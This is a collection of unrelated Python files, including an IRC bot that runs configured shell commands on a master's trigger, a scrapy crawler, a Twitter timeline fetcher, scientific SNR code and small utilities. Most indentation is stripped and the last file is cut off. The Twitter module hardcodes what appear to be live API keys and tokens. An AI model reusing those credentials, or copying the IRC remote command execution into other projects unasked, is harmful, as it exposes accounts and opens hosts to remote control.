self.channel = self.config.get('Network', 'Channel')
self.master = self.config.get('Security', 'Master')
self.trigger = self.config.get('Security', 'Trigger')
self.commands = self.config.options('Commands')
self.debugmode = self.config.get('Other', 'Debug')
def printConfig(self):
print "[*] Using the following connection settings:"
print " %s" % self.server
print " %d" % self.port
print " %s" % self.nick
print " %s" % self.channel
print ""
print "[*] Using the following security settings:"
print " Master: %s" % self.master
print " Trigger: %s\n" % self.trigger
print "[*] Listing commands:"
for command in self.commands:
print " %s%s" % (self.trigger, command)
print ""
def connect(self):
self.sock = socket.socket()
print "[*] Connecting!"
self.sock.connect((self.server, self.port))
print "[*] Sending nick and user information"
self.sock.send('NICK %s\r\n' % self.nick)
self.sock.send('USER %s 8 * :%s\r\n' % (self.nick, self.nick))
time.sleep(10)
self.sock.send('JOIN %s\r\n' % self.channel)
self.sock.send('PRIVMSG %s :Connected.\r\n' % self.channel)
print "[*] Connected!\n"
def fillBuffer(self):
self.buff = ""
self.sock.setblocking(0)
readable, _, _ = select.select([self.sock], [], [])
if self.sock in readable:
self.buff = ""
cont = True
while cont:
try:
self.buff += self.sock.recv(1024)
except socket.error,e:
if e.errno != errno.EWOULDBLOCK:
sys.exit(1)
cont = False
def parseCommands(self):
for line in self.buff.split('\r\n'):
if self.debugmode.lower() == "on":
print line
line = line.split()
if 'PING' in line:
print "[*] Replying to ping\n"
                self.sock.send('PONG ' + line[1] + '\r\n')
for command in self.commands:
if line and line[0].lower().startswith(":" + self.master.lower() + "!"):
if ":" + self.trigger + command in line:
print "[*] Found command %s%s\n" % (self.trigger, command)
self.sock.send('PRIVMSG %s :Executing command %s\r\n' % (self.channel, command))
cmd = self.config.get('Commands', command)
os.system(cmd)
if __name__ == '__main__':
commander = Commander()
commander.parseConfig()
commander.printConfig()
commander.connect()
commander.run()
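# Illustrative commander.conf layout (added sketch; all values are placeholders),
# matching the sections and keys that parseConfig() reads above:
#
#   [Network]
#   Server = irc.example.net
#   Port = 6667
#   Nickname = pineapple
#   Channel = #commander
#
#   [Security]
#   Master = yournick
#   Trigger = !
#
#   [Commands]
#   uptime = uptime
#   reboot = reboot
#
#   [Other]
#   Debug = off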
|
python
|
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from freeswitch import consoleLog
from core.apps import sms_credit_transfer
def chat(message, args):
consoleLog('info', "Credit transfer: %s\n" % args)
from_, request = args.split("|", 1)
sms_credit_transfer.handle_incoming(from_, request)
def fsapi(session, stream, env, args):
# chat doesn't use msg anyway
chat(None, args)
|
python
|
from scrapy.selector import Selector
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.url import urljoin_rfc
from sitegraph.items import SitegraphItem
class GraphspiderSpider(CrawlSpider):
name = 'graphspider'
allowed_domains = ['sastra.edu']
start_urls = ['https://www.sastra.edu/']
rules = (
Rule(LinkExtractor(allow=r'/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
hxs = Selector(response)
i = SitegraphItem()
i['url'] = response.url
i['http_status'] = response.status
llinks=[]
for anchor in hxs.xpath('//a[@href]'):
href=anchor.xpath('@href').extract()[0]
if not href.lower().startswith("javascript"):
llinks.append(urljoin_rfc(response.url,href))
i['linkedurls'] = llinks
return i
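# Usage sketch (added): from the Scrapy project that provides sitegraph.items,
# the spider can be run with the standard Scrapy CLI, e.g.
#   scrapy crawl graphspider -o sitegraph.json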
|
python
|
from ocean_spark.hooks import OceanSparkHook
from unittest.mock import MagicMock
def test_get_app(successful_get_app: None, get_connection_mock: None) -> None:
hook = OceanSparkHook()
app_dict = hook.get_app("test-app-name")
assert app_dict is not None
assert app_dict["displayName"] == "test app name"
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 26 15:13:29 2022
@author: jasy9
"""
from .topsis import TOPSIS
|
python
|
# Author: Ackerley Cheng
# file encoding: utf-8
def sameList(listA, listB):
return (len(listA) == len(listB)) and (set(listA) == set(listB))
def listInListSet(list, listSet):
for idx, ls in enumerate(listSet):
if sameList(list, ls):
return idx
return -1
# check if listA is a subset of listB
def isSubSet(listA, listB):
for item in listA:
if item not in listB:
return False
return True
# dump rule with beautified format
def beautifiedRuleSet(ruleSet):
ruleSet = list(sorted(ruleSet, key=lambda rule: rule.lift, reverse=True))
if len(ruleSet) <= 0:
out = 'found nothing.'
else:
out = 'Association Rules:\n'
        out += '[support,\tconfidence,\tlift,\t\trule]\n'
for rule in ruleSet:
out += '[' + str(rule.sup) + ',\t\t' + str(rule.conf)
out += ',\t\t' + str(rule.lift) + ',\t\t'
out += '{IF ' + str(rule.IF) + ' THEN ' + str(rule.THEN) + '} ]'
out += '\n'
return out
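# A small usage sketch (added; the Rule namedtuple below is hypothetical, the
# real rule objects only need .sup, .conf, .lift, .IF and .THEN attributes):
if __name__ == '__main__':
    from collections import namedtuple

    Rule = namedtuple('Rule', ['sup', 'conf', 'lift', 'IF', 'THEN'])
    rules = [
        Rule(0.4, 0.8, 1.6, ['bread'], ['butter']),
        Rule(0.3, 0.6, 1.2, ['milk'], ['bread']),
    ]
    print(beautifiedRuleSet(rules))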
|
python
|
from django import forms
from consent.models import Privilege
class PrivilegeForm(forms.ModelForm):
class Meta:
model = Privilege
class ConsentForm(forms.Form):
consents = forms.ModelMultipleChoiceField(Privilege.objects,
widget=forms.CheckboxSelectMultiple, required=False)
|
python
|
import numpy as np
from qm_2019_sss_6.NobleGasModel import NobleGasModel
from qm_2019_sss_6.scf import scf
from qm_2019_sss_6.mp2 import MP2
atomic_coordinates = np.array([[0.0, 0.0, 0.0], [3.0, 4.0, 5.0]])
# Derived from user input
number_of_atoms = len(atomic_coordinates)
# Argon parameters - these would change for other noble gases.
model_parameters = {
'r_hop' : 3.1810226927827516,
't_ss' : 0.03365982238611262,
't_sp' : -0.029154833035109226,
't_pp1' : -0.0804163845390335,
't_pp2' : -0.01393611496959445,
'r_pseudo' : 2.60342991362958,
'v_pseudo' : 0.022972992186364977,
'dipole' : 2.781629275106456,
'energy_s' : 3.1659446174413004,
'energy_p' : -2.3926873325346554,
'coulomb_s' : 0.3603533286088998,
'coulomb_p' : -0.003267991835806299
}
ionic_charge = 6
orbital_types = ['s', 'px', 'py', 'pz']
orbitals_per_atom = len(orbital_types)
p_orbitals = orbital_types[1:]
vec = {'px': [1, 0, 0], 'py': [0, 1, 0], 'pz': [0, 0, 1]}
orbital_occupation = { 's':0, 'px':1, 'py':1, 'pz':1 }
my_model = NobleGasModel(atomic_coordinates,model_parameters,ionic_charge,orbital_types,orbitals_per_atom,vec,orbital_occupation)
interaction_matrix,chi_tensor,hamiltonian_matrix,density_matrix,energy_ion = my_model.kernel()
my_scf = scf(hamiltonian_matrix,interaction_matrix,density_matrix,chi_tensor,energy_ion,ionic_charge,orbitals_per_atom)
print("SCF Energy: " + str(my_scf.kernel()))
my_mp2= MP2(my_scf)
print("MP2 Energy" + str(my_mp2.kernel()))
|
python
|
#!/usr/bin/env python3
import os
import random
from collections import namedtuple, defaultdict
dir_path = os.path.dirname(os.path.realpath(__file__))
file = open(dir_path + "/input.txt", "r")
lines = [l.strip() for l in file.readlines()]
"""
acc increases or decreases a single global value called the accumulator by the value given in the argument. For example, acc +7 would increase the accumulator by 7. The accumulator starts at 0. After an acc instruction, the instruction immediately below it is executed next.
jmp jumps to a new instruction relative to itself. The next instruction to execute is found using the argument as an offset from the jmp instruction; for example, jmp +2 would skip the next instruction, jmp +1 would continue to the instruction immediately below it, and jmp -20 would cause the instruction 20 lines above to be executed next.
nop stands for No OPeration - it does nothing. The instruction immediately below it is executed next.
"""
# lines = [
# 'nop +0',
# 'acc +1',
# 'jmp +4',
# 'acc +3',
# 'jmp -3',
# 'acc -99',
# 'acc +1',
# 'jmp -4',
# 'acc +6',
# ]
accumulator = 0
instruction_counts = defaultdict(int)
instruction_history = []
instruction_idx = 0
def acc(arg):
global accumulator
accumulator += arg
def jmp(arg):
global instruction_idx
instruction_idx += arg
def nop(arg):
return None
instructions = {
'acc': acc,
'jmp': jmp,
'nop': nop,
}
I = namedtuple('I', ['op', 'arg'])
def parse(line):
op, arg = line.split()
arg = int(arg)
return I(op, arg)
program = [parse(line) for line in lines]
# print(program)
terminated = False
while not terminated:
if 2 in instruction_counts.values():
break
instruction = program[instruction_idx]
instruction_counts[instruction_idx] += 1
instructions[instruction.op](instruction.arg)
instruction_history.append(instruction)
if instruction.op != 'jmp':
instruction_idx += 1
print('Part 1:', accumulator - instruction_history[-1].arg)
# lines = [
# 'nop +0',
# 'acc +1',
# 'jmp +4',
# 'acc +3',
# 'jmp -3',
# 'acc -99',
# 'acc +1',
# 'nop -4',
# 'acc +6',
# ]
def run_program(program):
accumulator = 0
instruction_counts = defaultdict(int)
instruction_history = []
instruction_idx = 0
terminated = False
success = False
while not terminated:
try:
instruction = program[instruction_idx]
except IndexError:
success = True
break
if 2 in instruction_counts.values():
break
# print(instruction)
instruction_counts[instruction_idx] += 1
instruction_history.append(instruction)
if instruction.op == 'acc':
accumulator += instruction.arg
instruction_idx += 1
if instruction.op == 'jmp':
instruction_idx += instruction.arg
if instruction.op == 'nop':
instruction_idx += 1
return success, accumulator
accumulator = 0
success = False
while not success:
program = [parse(line) for line in lines]
idx = random.choice(range(0, len(program)))
if program[idx].op == 'jmp':
arg = program[idx].arg
program[idx] = I('nop', arg)
elif program[idx].op == 'nop':
arg = program[idx].arg
program[idx] = I('jmp', arg)
# print(program)
success, accumulator = run_program(program)
print('Part 2:', accumulator)
|
python
|
import os
import pytz
from tweepy import OAuthHandler, API, TweepError
from . import Data
from abc import ABC, abstractmethod
import datetime
def check_if_datetime_offset_aware(date):
return date.tzinfo is not None and date.tzinfo.utcoffset(date) is not None
class SocialMediaDataFetch(ABC):
_start_date = datetime.datetime.now() - datetime.timedelta(days=7)
_end_date = datetime.datetime.now()
_data_lst = []
def __init__(self, start_date, end_date):
assert(start_date < end_date)
self._start_date = start_date
self._end_date = end_date
if (check_if_datetime_offset_aware(start_date)):
self._start_date = start_date.astimezone(pytz.utc).replace(tzinfo=None)
if (check_if_datetime_offset_aware(end_date)):
self._end_date = end_date.astimezone(pytz.utc).replace(tzinfo=None)
self._data_lst = []
@abstractmethod
def __get_api_access__(self):
pass
@abstractmethod
def __format_data__(self, data):
pass
@abstractmethod
def __filter_data_by_time__(self, data):
pass
@abstractmethod
def fetch_user_posts(self, user_id):
pass
def get_data_lst(self):
return self._data_lst
class TwitterDataFetch(SocialMediaDataFetch):
_api = None
def __init__(self, start_date = datetime.datetime.now() - datetime.timedelta(days=7), end_date = datetime.datetime.now()):
assert(start_date < end_date)
super().__init__(start_date, end_date)
def __get_user_timeline__(self, user_id, last_id = -1):
if last_id == -1:
new_tweets = self._api.user_timeline(screen_name=user_id, count=200, include_rts = False, tweet_mode = 'extended')
else:
new_tweets = self._api.user_timeline(screen_name=user_id, count=200, include_rts = False, max_id = str(last_id - 1), tweet_mode = 'extended')
return new_tweets
def __get_api_access__(self):
# TODO: move to env file once setup
consumer_key = "Ghsx0hbmNz5UKMrLaJX8Whlmv"
consumer_secret = "gBwqcEvRjJ4BVtvV3knQHgxnEXNzkikndtJsRpYkcz7rQ7eXkV"
access_token = "976956847138791424-oWw9Q00D5zMRpCMwcjiwUiFb7BelZb9"
access_token_secret = "iCDUsytTIjtpPtg3QopBmJifKIiw0Srbc06ROiOp0ZupF"
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
self._api = API(auth)
def __format_data__(self, searched_tweets):
for tweet in searched_tweets:
new_data = Data(tweet.full_text, tweet.created_at)
self._data_lst.append(new_data)
def __filter_data_by_time__(self, tweets):
# tweets are sorted by time from the latest to the earliest
if (self._start_date > tweets[0].created_at):
# means the latest tweet is earlier than the start date, search finished
return False
if (self._end_date < tweets[-1].created_at):
# means the earliest tweet is later than the end date, need to keep extracting
return True
earliest = (len(tweets) - 1)
latest = 0
if (self._start_date > tweets[-1].created_at):
earliest = self.__binary_search_get_time_index(tweets, self._start_date)
if (self._end_date < tweets[0].created_at):
latest = self.__binary_search_get_time_index(tweets[:earliest], self._end_date)
assert(latest >= 0) #prevent bug
self.__format_data__(tweets[latest: earliest])
return earliest == (len(tweets) - 1)
def __binary_search_get_time_index(self, tweets, time):
start_point = (len(tweets) - 1)
end_point = 0
pivot = (start_point + end_point)//2
while (start_point - end_point > 1):
if (time >= tweets[pivot].created_at):
start_point = pivot
else:
end_point = pivot
pivot = (start_point + end_point)//2
return start_point
def fetch_user_posts(self, user_id):
self._data_lst = []
self.__get_api_access__()
last_id = -1
keep_requesting = True
while (keep_requesting):
try:
new_tweets = self.__get_user_timeline__(user_id, last_id)
if not new_tweets:
break
last_id = new_tweets[-1].id
keep_requesting = self.__filter_data_by_time__(new_tweets)
except TweepError as e:
print(e)
break
if __name__ == '__main__':
dataFetch7 = TwitterDataFetch(start_date = datetime.datetime.now() - datetime.timedelta(days=1))
dataFetch7.fetch_user_posts("panettonepapi")
lst_7 = dataFetch7.get_data_lst()
print(len(lst_7))
dataFetch8 = TwitterDataFetch(start_date = datetime.datetime.now() - datetime.timedelta(days=2))
dataFetch8.fetch_user_posts("panettonepapi")
lst_8 = dataFetch8.get_data_lst()
print(len(lst_8))
dataFetch7.fetch_user_posts("panettonepapi")
lst_7 = dataFetch7.get_data_lst()
print(len(lst_7))
|
python
|
import sys
import traceback
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from cripts.config.config import CRIPTsConfig
from cripts.core.mongo_tools import mongo_find_one
from cripts.events.event import Event
from prep import prep_database
class Command(BaseCommand):
"""
Script Class.
"""
option_list = BaseCommand.option_list + (
make_option("-a", "--migrate_all", action="store_true", dest="mall",
default=False,
help="Migrate all collections."),
make_option("-E", "--migrate_events", action="store_true",
dest="events",
default=False,
help="Migrate events."),
)
help = 'Upgrades MongoDB to latest version using mass-migration.'
def handle(self, *args, **options):
"""
Script Execution.
"""
lv = settings.CRIPTS_VERSION
mall = options.get('mall')
events = options.get('events')
        if (not mall and
                not events):
print "You must select something to upgrade. See '-h' for options."
sys.exit(1)
else:
upgrade(lv, options)
def migrate_collection(class_obj, sort_ids):
"""
Migrate a collection by opening each document. This will, by nature of the
core functionality in `cripts.core.cripts_mongoengine` check the
schema_version and migrate it if it is not the latest version.
:param class_obj: The class to migrate documents for.
:type class_obj: class that inherits from
:class:`cripts.core.cripts_mongoengine.CriptsBaseAttributes`
:param sort_ids: If we should sort by ids ascending.
:type sort_ids: boolean
"""
# find all documents that don't have the latest schema version
# and migrate those.
version = class_obj._meta['latest_schema_version']
print "\nMigrating %ss" % class_obj._meta['cripts_type']
if sort_ids:
docs = (
class_obj.objects(schema_version__lt=version)
.order_by('+id')
.timeout(False)
)
else:
docs = class_obj.objects(schema_version__lt=version).timeout(False)
total = docs.count()
if not total:
print "\tNo %ss to migrate!" % class_obj._meta['cripts_type']
return
print "\tMigrated 0 of %d" % total,
count = 0
doc = None
try:
for doc in docs:
if 'migrated' in doc._meta and doc._meta['migrated']:
count += 1
print "\r\tMigrated %d of %d" % (count, total),
print ""
except Exception as e:
# Provide some basic info so admin can query their db and figure out
# what bad data is blowing up the migration.
print "\n\n\tAn error occurred during migration!"
print "\tMigrated: %d" % count
formatted_lines = traceback.format_exc().splitlines()
print "\tError: %s" % formatted_lines[-1]
if hasattr(e, 'tlo'):
print "\tDocument ID: %s" % e.tlo
else:
doc_id = mongo_find_one(class_obj._meta.get('collection'),
{'schema_version': {'$lt': version}}, '_id')
print "\tDocument ID: %s" % doc_id.get('_id')
if doc:
print "\tLast ID: %s" % doc.id
sys.exit(1)
def upgrade(lv, options):
"""
Perform the upgrade.
:param lv: The CRIPTs version we are running.
:type lv: str
:param options: The options passed in for what to upgrade.
:type options: dict
"""
# eventually we will do something to check to see what the current version
# of the CRIPTs DB is so we can upgrade through several versions at once.
# this is important if prep scripts need to be run for certain upgrades
# to work properly.
mall = options.get('mall')
events = options.get('events')
    skip = options.get('skip')
    sort_ids = options.get('sort_ids', False)
# run prep migrations
if not skip:
prep_database()
# run full migrations
if mall or events:
migrate_collection(Event, sort_ids)
# Always bump the version to the latest in settings.py
config = CRIPTsConfig.objects()
if len(config) > 1:
print "You have more than one config object. This is really bad."
else:
config = config[0]
config.cripts_version = settings.CRIPTS_VERSION
config.save()
|
python
|
from d20.Manual.Facts import (Fact,
registerFact)
from d20.Manual.Facts.Fields import StringField
@registerFact('hash')
class MD5HashFact(Fact):
_type_ = 'md5'
value = StringField()
@registerFact('hash')
class SHA1HashFact(Fact):
_type_ = 'sha1'
value = StringField()
@registerFact('hash')
class SHA256HashFact(Fact):
_type_ = 'sha256'
value = StringField()
@registerFact('hash')
class SSDeepHashFact(Fact):
_type_ = 'ssdeep'
value = StringField()
@registerFact()
class MimeTypeFact(Fact):
_type_ = 'mimetype'
mimetype = StringField()
filetype = StringField()
|
python
|
"""Module contains the pydvdid package definition.
"""
from setuptools import setup
with open('README.rst') as readme_file:
README = readme_file.read()
setup(
name="pydvdid",
version="1.1",
description="A pure Python implementation of the Windows API IDvdInfo2::GetDiscID method, as used by Windows Media Center to compute a 'practically unique' 64-bit CRC for metadata retrieval.", # pylint: disable=locally-disabled, line-too-long
long_description=README,
author="Steve Wood",
author_email="[email protected]",
url="https://github.com/sjwood/pydvdid",
packages=[
"pydvdid"
],
scripts=[
"bin/pydvdid"
],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Natural Language :: English",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Home Automation",
"Topic :: Multimedia :: Video",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
],
license="Apache License 2.0",
)
|
python
|
import pygame
from .math_helpers import *
def draw(surface, p1,p2, shading_function, section_length,section_offset):
#Adapted Bresenham's line algorithm from
#http://en.wikipedia.org/wiki/Bresenham%27s_line_algorithm
x0,y0 = p1
x1,y1 = p2
dx = abs(x1 - x0)
dy = abs(y1 - y0)
if x0 < x1: sx = 1
else: sx = -1
if y0 < y1: sy = 1
else: sy = -1
err = dx - dy
while True:
displacement = vec_length(vec_sub([x0,y0],p1)) + section_offset
surface.set_at((x0,y0),shading_function( (displacement%section_length)/section_length ))
if x0 == x1 and y0 == y1: break
e2 = 2 * err
if e2 > -dy:
err = err - dy
x0 = x0 + sx
if e2 < dx:
err = err + dx
y0 = y0 + sy
def aadraw(surface, p1,p2, shading_function, section_length,section_offset, blend):
#Adapted Xiaolin Wu's line algorithm from
#http://en.wikipedia.org/wiki/Xiaolin_Wu%27s_line_algorithm
x0,y0 = p1
x1,y1 = p2
def plot(x,y, c):
displacement = vec_length(vec_sub([x,y],p1)) + section_offset
color2 = shading_function( (displacement%section_length)/float(section_length) )
if blend:
color1 = surface.get_at((x,y))
color = [rndint(color1[i]*(1.0-c) + c*color2[i]) for i in [0,1,2]]
else:
color = [rndint(c*color2[i]) for i in [0,1,2]]
surface.set_at((x,y),color)
def fpart(x): return x - int(x)
def rfpart(x): return 1.0 - fpart(x)
steep = abs(y1 - y0) > abs(x1 - x0)
if steep:
x0,y0 = y0,x0
x1,y1 = y1,x1
if x0 > x1:
x0,x1 = x1,x0
y0,y1 = y1,y0
dx = x1 - x0
dy = y1 - y0
gradient = float(dy) / float(dx)
#handle first endpoint
xend = round(x0)
yend = y0 + gradient * (xend - x0)
xgap = rfpart(x0 + 0.5)
xpxl1 = int(xend) #this will be used in the main loop
ypxl1 = int(yend)
if steep:
plot(ypxl1, xpxl1, rfpart(yend) * xgap)
plot(ypxl1+1, xpxl1, fpart(yend) * xgap)
else:
plot(xpxl1, ypxl1, rfpart(yend) * xgap)
plot(xpxl1, ypxl1+1, fpart(yend) * xgap)
intery = yend + gradient # first y-intersection for the main loop
#handle second endpoint
xend = round(x1)
yend = y1 + gradient * (xend - x1)
xgap = fpart(x1 + 0.5)
xpxl2 = int(xend) #this will be used in the main loop
ypxl2 = int(yend)
if steep:
plot(ypxl2 , xpxl2, rfpart(yend) * xgap)
plot(ypxl2+1, xpxl2, fpart(yend) * xgap)
else:
plot(xpxl2, ypxl2, rfpart(yend) * xgap)
plot(xpxl2, ypxl2+1, fpart(yend) * xgap)
#main loop
for x in range(xpxl1+1, xpxl2, 1):
#for x from xpxl1 + 1 to [through] xpxl2 - 1 do
if steep:
plot(int(intery), x, rfpart(intery))
plot(int(intery)+1, x, fpart(intery))
else:
plot(x, int(intery), rfpart(intery))
plot(x, int(intery)+1, fpart(intery))
intery = intery + gradient
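# A minimal usage sketch (added; surface size, endpoints and output path are
# hypothetical). The shading function receives the fractional position within
# a section (0.0 to 1.0) and must return an RGB colour. Note that the relative
# math_helpers import at the top means this file must be run as part of its
# package for the sketch to work.
if __name__ == "__main__":
    pygame.init()
    surf = pygame.Surface((100, 100))

    def dashed(t):
        # white for the first half of each section, black for the rest
        return (255, 255, 255) if t < 0.5 else (0, 0, 0)

    draw(surf, (10, 10), (90, 80), dashed, section_length=10, section_offset=0)
    aadraw(surf, (10, 90), (90, 20), dashed, section_length=10, section_offset=0, blend=True)
    pygame.image.save(surf, "dashed_lines_example.png")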
|
python
|
from flask_pyoidc.flask_pyoidc import OIDCAuthentication
from tenacity import retry
@retry
def get_auth(app):
auth = OIDCAuthentication(
app,
issuer=app.config['OIDC_ISSUER'],
client_registration_info=app.config['OIDC_CLIENT_CONFIG'],
)
return auth
|
python
|
"""Functions to calculate signal-to-noise ratio in four different cases"""
import numpy as np
from legwork import strain, psd, utils, evol
import astropy.units as u
__all__ = ['snr_circ_stationary', 'snr_ecc_stationary',
'snr_circ_evolving', 'snr_ecc_evolving']
def snr_circ_stationary(m_c, f_orb, dist, t_obs, position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None, instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
"""
# only need to compute n=2 harmonic for circular
h_0_circ_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=np.zeros_like(f_orb).value, n=2, dist=dist,
position=position, polarisation=polarisation, inclination=inclination,
interpolated_g=interpolated_g).flatten()**2
h_f_src_circ_2 = h_0_circ_2 * t_obs
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb, t_obs=t_obs, instrument=instrument,
custom_psd=custom_psd)
snr = (h_f_src_circ_2 / h_f_lisa_2)**0.5
return snr.decompose()
def snr_ecc_stationary(m_c, f_orb, ecc, dist, t_obs, harmonics_required,
position=None, polarisation=None, inclination=None,
interpolated_g=None, interpolated_sc=None,
ret_max_snr_harmonic=False, ret_snr2_by_harmonic=False,
instrument="LISA", custom_psd=None):
"""Computes SNR for eccentric and stationary sources
Parameters
----------
m_c : `float/array`
Chirp mass
f_orb : `float/array`
Orbital frequency
ecc : `float/array`
Eccentricity
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
harmonics_required : `integer`
Maximum integer harmonic to compute
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
ret_max_snr_harmonic : `boolean`
Whether to return (in addition to the snr), the harmonic with the maximum SNR
ret_snr2_by_harmonic : `boolean`
Whether to return the SNR^2 in each individual harmonic rather than the total.
        The total can be retrieved by summing and then taking the square root.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
snr : `float/array`
SNR for each binary
max_snr_harmonic : `int/array`
harmonic with maximum SNR for each binary (only returned if ``ret_max_snr_harmonic=True``)
"""
# define range of harmonics
n_range = np.arange(1, harmonics_required + 1).astype(int)
# calculate source signal
h_0_ecc_n_2 = strain.h_0_n(m_c=m_c, f_orb=f_orb, ecc=ecc, n=n_range, dist=dist,
position=position, polarisation=polarisation,
inclination=inclination, interpolated_g=interpolated_g)**2
# reshape the output since only one timestep
h_0_ecc_n_2 = h_0_ecc_n_2.reshape(len(m_c), harmonics_required)
h_f_src_ecc_2 = h_0_ecc_n_2 * t_obs
# calculate harmonic frequencies and noise
f_n = n_range[np.newaxis, :] * f_orb[:, np.newaxis]
if interpolated_sc is not None:
h_f_lisa_n_2 = interpolated_sc(f_n.flatten())
h_f_lisa_n_2 = h_f_lisa_n_2.reshape(f_n.shape)
else:
h_f_lisa_n_2 = psd.power_spectral_density(f=f_n, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
snr_n_2 = (h_f_src_ecc_2 / h_f_lisa_n_2).decompose()
if ret_snr2_by_harmonic:
return snr_n_2
# calculate the signal-to-noise ratio
snr = (np.sum(snr_n_2, axis=1))**0.5
if ret_max_snr_harmonic:
max_snr_harmonic = np.argmax(snr_n_2, axis=1) + 1
return snr, max_snr_harmonic
else:
return snr
def snr_circ_evolving(m_1, m_2, f_orb_i, dist, t_obs, n_step,
position=None, polarisation=None, inclination=None, t_merge=None,
interpolated_g=None, interpolated_sc=None,
instrument="LISA", custom_psd=None):
"""Computes SNR for circular and stationary sources
Parameters
----------
m_1 : `float/array`
Primary mass
m_2 : `float/array`
Secondary mass
f_orb_i : `float/array`
Initial orbital frequency
dist : `float/array`
Distance to the source
t_obs : `float`
Total duration of the observation
n_step : `int`
Number of time steps during observation duration
position : `SkyCoord/array`, optional
Sky position of source. Must be specified using Astropy's :class:`astropy.coordinates.SkyCoord` class.
polarisation : `float/array`, optional
GW polarisation of the source. Must have astropy angular units.
inclination : `float/array`, optional
Inclination of the source. Must have astropy angular units.
t_merge : `float/array`
Time until merger
interpolated_g : `function`
A function returned by :class:`scipy.interpolate.interp2d` that computes g(n,e) from Peters (1964).
The code assumes that the function returns the output sorted as with the interp2d returned functions
(and thus unsorts). Default is None and uses exact g(n,e) in this case.
interpolated_sc : `function`
A function returned by :class:`scipy.interpolate.interp1d` that computes the LISA sensitivity curve.
Default is None and uses exact values. Note: take care to ensure that your interpolated function has
the same LISA observation time as ``t_obs`` and uses the same instrument.
instrument : `{{ 'LISA', 'TianQin', 'custom' }}`
Instrument to observe with. If 'custom' then ``custom_psd`` must be supplied.
custom_psd : `function`
Custom function for computing the PSD. Must take the same arguments as :meth:`legwork.psd.lisa_psd`
even if it ignores some.
Returns
-------
    snr : `float/array`
SNR for each binary
"""
m_c = utils.chirp_mass(m_1=m_1, m_2=m_2)
# calculate minimum of observation time and merger time
if t_merge is None:
t_merge = evol.get_t_merge_circ(m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
t_evol = np.minimum(t_merge - (1 * u.s), t_obs)
# get f_orb evolution
f_orb_evol = evol.evol_circ(t_evol=t_evol, n_step=n_step, m_1=m_1, m_2=m_2, f_orb_i=f_orb_i)
maxes = np.where(f_orb_evol == 1e2 * u.Hz, -1 * u.Hz, f_orb_evol).max(axis=1)
for source in range(len(f_orb_evol)):
f_orb_evol[source][f_orb_evol[source] == 1e2 * u.Hz] = maxes[source]
# calculate the characteristic power
h_c_n_2 = strain.h_c_n(m_c=m_c, f_orb=f_orb_evol, ecc=np.zeros_like(f_orb_evol).value, n=2, dist=dist,
interpolated_g=interpolated_g)**2
h_c_n_2 = h_c_n_2.reshape(len(m_c), n_step)
# calculate the characteristic noise power
if interpolated_sc is not None:
h_f_lisa_2 = interpolated_sc(2 * f_orb_evol.flatten())
h_f_lisa_2 = h_f_lisa_2.reshape(f_orb_evol.shape)
else:
h_f_lisa_2 = psd.power_spectral_density(f=2 * f_orb_evol, t_obs=t_obs,
instrument=instrument, custom_psd=custom_psd)
